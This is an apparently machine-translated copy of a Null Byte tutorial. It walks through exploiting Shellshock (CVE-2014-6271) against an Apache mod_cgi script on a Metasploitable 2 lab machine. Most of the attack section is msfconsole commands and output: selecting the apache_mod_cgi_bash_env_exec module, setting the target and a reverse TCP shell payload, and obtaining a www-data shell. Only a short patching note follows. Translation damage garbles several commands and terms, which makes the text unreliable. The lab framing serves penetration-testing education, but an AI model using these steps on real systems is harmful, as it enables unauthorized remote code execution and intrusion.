قالب وردپرس درنا توس
Home / Tips and Tricks / How to Exploit Shellshock on a Metasploit Web Server «Null Byte :: WonderHowTo

How to Exploit Shellshock on a Metasploit Web Server «Null Byte :: WonderHowTo



One of the most critical bugs in the past five years has been Shellshock, a vulnerability that allows attackers to remotely play arbitrary code through the Unix Bash Shell. This vulnerability has been around for some time, but with the ubiquity of Unix computers connected to the Web, Shellshock still poses a very real threat.

How the Shellshock Vulnerability Works

Shellshock has been released first time back in September 2014. There were reports of attacks within hours of the first disclosure of the vulnerability, and in the next few days there were millions of attacks and probes from botnets.

Bash is a shell or interpreter that can execute commands on a system, usually through a text window. It is usually the default shell on Unix systems and can therefore be found under Linux, macOS and other different Unix variants. That's why Shellshock is so strict ̵

1; more than half of the web servers on the Internet use Unix, not to mention a variety of IoT devices and even some routers.

Essentially, Shellshock works by attaching commands to function definitions in the environment variable values. This would be classified as a kind of code injection attack, and since Bash processes these commands after the function definition, pretty much any code can be executed.

Shellshock is actually a whole family of vulnerabilities that consist of multiple exploitation vectors. In this guide, we will take advantage of the attack vector of the CGI script, specifically the mod_cgi module that is part of the Apache HTTP server.

How Apache and CGI Play in It

Apache is a cross-platform open source Web server platform developed by the Apache Software Foundation. It is robust with features like virtual hosting, authentication schemes, SSL and TLS, custom error messages and multi-language support. Apache also has a module called mod_cgi that handles the execution of CGI (Common Gateway Interface) scripts.

CGI is a protocol that allows web servers to run console-like programs directly on the server. These programs, called CGI scripts, often handle data from dynamic web pages and interact with HTTP. A new directory, usually called cgi-bin or something similar, must be set up to run CGI scripts. When a browser requests the URL of a particular file in the CGI directory, the server executes the script and the output is returned to the browser.

When CGI scripts are run, certain information is copied to environment variables. This information is then passed to Bash when it is called, which allows an attacker to inject malicious code. Fortunately, the Rapid7 team has developed a Metasploit module that makes exploiting this vulnerability very easy.

What you need for this walkthrough

Metasploitable 2 is an excellent virtual machine full of security holes to practice your hacking skills. I'll attack that in an isolated network with the loyal Kali Linux. You may want to do the same to make sure you get the same results the first time you try them. then you can proceed with the penstest of real machines.

Step 1: Configure Target

For this exploit to work, an executable script must be in the / cgi-bin directory. A simple "hello world!" Bash script is for demonstration purposes. On the destination computer, navigate to / usr / lib / cgi-bin and enter the following command:

  sudo nano hello.sh 

Enter the correct password and leave the file look like this:

  #! / bin / bash
echo "Content Type: text / html"
Echo ""
echo "Hello world!" 

Press Ctrl-X followed by Y and Enter to save. To make this file executable, use the command chmod :

  sudo chmod 755 hello.sh 

We can verify that this works properly by navigating to the file on the Web server:

Step 2: Prepare Exploit

Start metasploit on the Kali machine by typing msfconsole in the terminal. We are greeted with a random banner and Metasploit prompt:

  root @ kali: ~ # msfconsole

____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]

         = [ metasploit v4.17.3-dev-                         ]
+ - - = [ 1795 exploits - 1019 auxiliary - 310 post       ]
+ - - = [ 538 payloads - 41 encoders - 10 nops            ]
+ - - = [ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf> 

With the command search we can easily search for exploits. Type search shellshock locate the module apache_mod_cgi_bash_env_exec and copy the location:

  msf> search shellshock
[!] Module database cache has not yet been created with slow search

Matching modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary / scanner / http / apache_mod_cgi_bash_env 2014-09-24 normal apache mod_cgi bash environment variable injection (shellshock) scanner
auxiliary / server / dhclient_bash_env 2014-09-24 normal DHCP Client Bash Environment variable code injection (shellshock)
exploit / linux / http / advantech_switch_bash_env_exec 2015-12-01 excellent Advantech Switch Bash Environment variable code injection (shellshock)
exploit / linux / http / ipfire_bashbug_exec 2014-09-29 awarded IPFire Bash Environment Variable Injection (Shellshock)
exploit / multi / ftp / pureftpd_bash_env_exec 2014-09-24 excellent Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
exploit / multi / http / apache_mod_cgi_bash_env_exec 2014-09-24 awarded Apache mod_cgi Bash environment variable code injection (shellshock)
Exploit / multi / http / cups_bash_env_exec 2014-09-24 awarded CUPS Filter Bash Environment Variable Code Injection (Shellshock)
exploit / multi / misc / legend_bot_exec 2015-04-27 awarded Legend Perl IRC Bot remote code execution
exploit / multi / misc / xdh_x_exec 2015-12-04 excellent Xdh / LinuxNet Perlbot / fbot IRC bot remote code execution
exploit / osx / local / vmware_bash_function_root 2014-09-24 Normal OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
exploit / unix / dhcp / bash_environment 2014-09-24 awarded Dhclient Bash Environment Variable Injection (Shellshock)
exploit / unix / smtp / qmail_bash_env_exec 2014-09-24 normal Qmail SMTP Bash environment variable injection (shellshock)

msf> 

Download this exploit by typing followed by the place we copied earlier. Now you should see a longer prompt indicating the currently loaded module.

  msf> use exploit / multi / http / apache_mod_cgi_bash_env_exec
msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> 

Enter options to see the various settings for this module:

  msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> options

Module options (exploit / multi / http / apache_mod_cgi_bash_env_exec):

Name Current setting required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD maximum line length
CVE CVE-2014-6271 yes CVE to be tested / exploited (Adopted: CVE-2014-6271, CVE-2014-6278)
HEADER user agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type: host: port [,type:host:port][...]
     RHOST yes The destination address
RPATH / am the destination path for binaries used by the CmdStager
RPORT 80 yes The destination port (TCP)
SRVHOST 0.0.0.0 Yes The local host to listen to. This must be an address on the local computer or 0.0.0.0
SRVPORT 8080 yes The local port to listen to.
SSL false no Negotiate SSL / TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to the CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Exploit target:

ID name
- ----
0 Linux x86

msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> 

We can leave most defaults, but we need to set the remote host to the IP address of the target and the target URI of the file that we put into the / cgi file. bin directory as follows:

  msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> set rhost 172.16.1.102
rhost => 172.16.1.102
msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> set targeturi /cgi-bin/hello.sh
targeturi => /cgi-bin/hello.sh
msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> 

Next we have to select a payload. Enter Show User Data to display various payloads and information about each of them:

  msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> View Payload

Compatible payloads
======================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic / custom normal custom payload
generic / debug_trap normal Generic x86 debug trap
generic / shell_bind_tcp normal Generic command shell, bind TCP inline
generic / shell_reverse_tcp normal generic command shell, reverse TCP inline
generic / tight_loop normal Generic x86 Tight Loop
Linux / x86 / chmod normal Linux Chmod
linux / x86 / exec run normal Linux command
linux / x86 / meterpreter / bind_ipv6_tcp normal Linux Mettle x86, bind IPv6 TCP Stager (Linux x86)
linux / x86 / meterpreter / bind_ipv6_tcp_uuid normal Linux Mettle x86, bind IPv6 TCP Stager with UUID support (Linux x86)
linux / x86 / meterpreter / bind_nonx_tcp normal Linux Mettle x86, bind TCP Stager
linux / x86 / meterpreter / bind_tcp normal Linux Mettle x86, bind TCP Stager (Linux x86)
linux / x86 / meterpreter / bind_tcp_uuid normal Linux Mettle x86, Bind TCP Stager with UUID support (Linux x86)
linux / x86 / meterpreter / reverse_ipv6_tcp normal linux mettle x86, reverse TCP stager (IPv6)
linux / x86 / meterpreter / reverse_nonx_tcp normal linux mettle x86, reverse TCP stager
linux / x86 / meterpreter / reverse_tcp normal linux mettle x86, reverse TCP stager
linux / x86 / metrepreter / reverse_tcp_uuid normal linux mettle x86, reverse TCP stager
linux / x86 / metsvc_bind_tcp normal linux meterpreter service, Bind TCP
linux / x86 / metsvc_reverse_tcp normal linux meterpreter service, reverse TCP inline
read linux / x86 / read_file normal Linux file
linux / x86 / shell / bind_ipv6_tcp normal Linux command shell, Bind IPv6 TCP Stager (Linux x86)
linux / x86 / shell / bind_ipv6_tcp_uuid normal Linux Command Shell, Bind IPv6 TCP Stager with UUID support (Linux x86)
linux / x86 / shell / bind_nonx_tcp normal Linux Command Shell, Bind TCP Stager
linux / x86 / shell / bind_tcp normal Linux Command Shell, Bind TCP Stager (Linux x86)
linux / x86 / shell / bind_tcp_uuid normal Linux Command Shell, Bind TCP Stager with UUID support (Linux x86)
linux / x86 / shell / reverse_ipv6_tcp normal Linux shell, Reverse TCP Stager (IPv6)
linux / x86 / shell / reverse_nonx_tcp normal Linux command shell, reverse TCP stager
linux / x86 / shell / reverse_tcp normal Linux shell, reverse TCP stager
linux / x86 / shell / reverse_tcp_uuid normal Linux shell, reverse TCP stager
linux / x86 / shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6)
linux / x86 / shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux / x86 / shell_bind_tcp_random_port normal Linux command shell, bind TCP random port inline
linux / x86 / shell_reverse_tcp normal Linux shell, reverse TCP inline
linux / x86 / shell_reverse_tcp_ipv6 normal Linux shell, reverse TCP inline (IPv6)

msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> 

Here's a reverse TCP shell, so type set nload / linux / x86 / shell / reverse_tcp to enable it.

  msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> set payload linux / x86 / shell / reverse_tcp
Payload => linux / x86 / shell / reverse_tcp 

Retype options and we can see the current settings for this module including payload:

  msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> options

Module options (exploit / multi / http / apache_mod_cgi_bash_env_exec):

Name Current setting required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD maximum line length
CVE CVE-2014-6271 yes CVE to be tested / exploited (Adopted: CVE-2014-6271, CVE-2014-6278)
HEADER user agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of the format type: Host: Port [,type:host:port][...]
     RHOST 172.16.1.102 yes The destination address
RPATH / am the destination path for binaries used by the CmdStager
RPORT 80 yes The destination port (TCP)
SRVHOST 0.0.0.0 Yes The local host to listen to. This must be an address on the local computer or 0.0.0.0
SRVPORT 8080 yes The local port to listen to.
SSL false no Negotiate SSL / TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /cgi-bin/hello.sh yes Path to the CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload options (linux / x86 / shell / reverse_tcp):

Name Current setting required Description
---- --------------- -------- -----------
LHOST 172.16.1.100 yes The listening address (an interface can be specified)
LPORT 4444 yes The list port

Exploit target:

ID name
- ----
0 Linux x86

msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> 

Step 3: Get Shell

Some Metasploit modules have a handy little function that checks if the target is vulnerable. Enter check and if the module allows it, information will be displayed on whether the target is vulnerable or not.

  msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> check
[*] 172.16.1.102:80 The target is vulnerable.
msf exploit (multi / http / apache_mod_cgi_bash_env_exec)> 

We can see that the target is actually vulnerable. Therefore, use the command exploit to start the attack. A shell session opens, and we can now execute commands such as id and whoami to display information about the current user:

  msf exploit (multi / http / apache_mod_cgi_bash_env_exec) > exploit

[*] The reverse TCP handler started at 172.16.1.100:4444
[*] Stager Progress command - 100.46% done (1097/1092 bytes)
[*] Send phase (36 bytes) to 172.16.1.102
[*] Command Shell Session 2 opened at 2018-07-16 13:55:15 -0500 (172.16.1.1004444 -> 172.16.1.102:49499)

I would
uid = 33 (www data) gis = 33 (www data) Groups = 33 (www data)
who am I
www-data 

How to Protect yourself from Shellshock Vulnerabilities

The answer is simple: patch your system. If your system is not yet patched, you have nothing but yourself. This vulnerability has not existed for years and patches are available on almost all systems.

Stay focused on escalating resources

So far, we've learned about Shellshock and the CGI attack vector, used a Metasploit module to exploit this vulnerability, and won a shell on our target system. But since this is a limited shell, we can only do so much. In the next article, we'll use a kernel exploit to escalate permissions and get root.

Title image of Tumisu / Pixabay; Screenshots of drd_ / zero byte

Source link